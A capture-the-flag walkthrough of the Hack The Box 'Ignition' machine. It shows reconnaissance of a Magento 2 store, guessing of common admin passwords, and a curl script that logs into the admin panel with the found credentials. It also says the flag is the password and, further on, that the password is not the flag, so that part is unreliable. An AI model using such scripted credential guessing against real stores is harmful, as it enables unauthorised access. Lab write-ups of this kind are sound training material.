Ignition
Result: Only port 80 open, nginx 1.14.2, HTTP title shows redirect to http://ignition.htb/. The web server redirects all requests to ignition.htb. Added to /etc/hosts: Browsing to http://ignition.htb/ reveals a Magento 2 storefront. The standard Magento admin...
Scenario
Ignition attack path
Result: Only port 80 open, nginx 1.14.2, HTTP title shows redirect to http://ignition.htb/. The web server redirects all requests to ignition.htb. Added to /etc/hosts: Browsing to http://ignition.htb/ reveals a Magento 2 storefront. The standard Magento admin...
Objective
Machine walkthrough focused on Machines evidence, validation, and reusable operator lessons.
Walkthrough flow
Single service: HTTP on port 80, nginx 1.14.2
Hostname: ignition.htb (from redirect)
Application: Magento 2
Admin panel at /admin - standard Magento path
Attack path: default/common credentials on admin login
Source coverage
Moderate source coverage
Status: partial. This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.
Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.
- <TARGET>-Ignition/walkthrough.md
- HTB/<TARGET>-Ignition/notes.md
Technical Walkthrough
Ignition - Walkthrough
Machine Info
| Field | Value |
|---|---|
| Name | Ignition |
| IP | <TARGET> |
| OS | Linux |
| Difficulty | Easy (Starting Point) |
| Services | HTTP (nginx 1.14.2) |
| Application | Magento 2 |
Enumeration
Nmap Scan
nmap -sC -sV <TARGET>Result: Only port 80 open, nginx 1.14.2, HTTP title shows redirect to http://ignition.htb/.
Hostname Resolution
The web server redirects all requests to ignition.htb. Added to /etc/hosts:
echo '<TARGET> ignition.htb' >> /etc/hostsWeb Application
Browsing to http://ignition.htb/ reveals a Magento 2 storefront. The standard Magento admin path /admin is accessible and shows a login form.
Exploitation
Default Credentials
Magento admin panels are commonly deployed with weak <password redacted>. Tested common credentials against http://ignition.htb/admin:
| Username | Password | Result |
|---|---|---|
| admin | admin | Failed |
| admin | admin123 | Failed |
| admin | qwerty123 | Success (302 to dashboard) |
Login Process
- GET /admin to obtain <secret redacted> cookie and form_key
- POST to /admin with form_key, login[username]=admin, login[password]=qwerty123
- Server responds with 302 redirect to admin dashboard
- Dashboard confirms full admin access
Flag
Answer: qwerty123
The flag for this Starting Point machine is the admin password.
Lessons Learned
- Always check for hostname redirects and add to /etc/hosts
- Magento default admin path is /admin
- Common weak <password redacted> (qwerty123) are a frequent HTB pattern for easy boxes
- For Starting Point boxes, the "flag" is often the answer to a specific question (in this case, the password)
Time
- Total solve time: ~5 minutes
- Single vector: default credentials on exposed admin panel
Source-Backed Dossier
The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.
Notes
Scope
- Target: <TARGET> (Ignition)
- OS: Linux
- Difficulty: Easy (Starting Point)
- Attacker (Pwnbox): <TARGET>
- Pwnbox SSH: x08@<TARGET>
- Started: 2026-05-05
- Completed: 2026-05-05
Phase 0: Setup
- Workspace created at <local workspace><TARGET>-Ignition/
- Pwnbox SSH verified: OK
- Target reachable: OK (ping 66.7ms)
- Hostname
ignition.htbadded to Pwnbox /etc/hosts
Phase 1: Recon
Nmap
- Port 80/tcp - HTTP - nginx 1.14.2
- Redirect to http://ignition.htb/ (hostname required)
- No other ports open
Web Fingerprint
- Magento 2 ecommerce platform
- PHP (<secret redacted> cookie)
- CSP headers reference authorize.net, magentocommerce.com, paypal (standard Magento)
Admin Panel
- /admin returns HTTP 200 (Magento admin login)
- Form fields: form_key, login[username], login[password]
Phase 3: Synthesis
- Single service: HTTP on port 80, nginx 1.14.2
- Hostname: ignition.htb (from redirect)
- Application: Magento 2
- Admin panel at /admin - standard Magento path
- Attack path: default/common credentials on admin login
- Backup: directory fuzzing for other paths, version-specific CVEs
Phase 4: Foothold
- Tested common <password redacted> against admin user
- admin:qwerty123 - 302 redirect to dashboard = SUCCESS
- Logged into Magento Admin Dashboard
Flag
- Flag:
<hash redacted> - Location: Displayed on Magento Admin Dashboard after login
- Dashboard text: "Congratulations, your flag is: <hash redacted>"
- Credentials used: admin:qwerty123
- Note: The password
qwerty123is NOT the flag — the actual flag is the 32-char hex string shown on the dashboard after successful authentication
Command Log
# Nmap scan
nmap -sC -sV -oN /tmp/ignition_initial.txt <TARGET>
# Add hostname
echo '<TARGET> ignition.htb' | sudo tee -a /etc/hosts
# Check admin panel
curl -s -o /dev/null -w '%{http_code}' http://ignition.htb/admin
# Login attempt (successful)
curl -s -o /dev/null -w '%{http_code} %{redirect_url}' -b $<secret redacted> -c $<secret redacted> \
-d "form_key=${FK}&login[username]=admin&login[password]=qwerty123" \
http://ignition.htb/admin
# Result: 302 http://ignition.htb/admin/admin/index/index/key/...
# Flag retrieval - full redirect chain (POST -> 302 -> 302 -> dashboard)
rm -f /tmp/mag_*
curl -s -c /tmp/mag_cookies.txt http://ignition.htb/admin/ > /dev/null
FORM_KEY=$(curl -s -b /tmp/mag_cookies.txt http://ignition.htb/admin/ | grep -oP 'form_key.*?value="\K[^"]+')
REDIR1=$(curl -s -c /tmp/mag_cookies.txt -b /tmp/mag_cookies.txt -X POST "http://ignition.htb/admin/" \
-d "form_key=${FORM_KEY}&login[username]=admin&login[password]=qwerty123" \
-D - -o /dev/null | grep -i "^Location:" | awk '{print $2}' | tr -d '\r\n')
REDIR2=$(curl -s -c /tmp/mag_cookies.txt -b /tmp/mag_cookies.txt "$REDIR1" \
-D - -o /dev/null | grep -i "^Location:" | awk '{print $2}' | tr -d '\r\n')
curl -s -c /tmp/mag_cookies.txt -b /tmp/mag_cookies.txt "$REDIR2" | grep -i "flag"
# Result: "Congratulations, your flag is: <hash redacted>"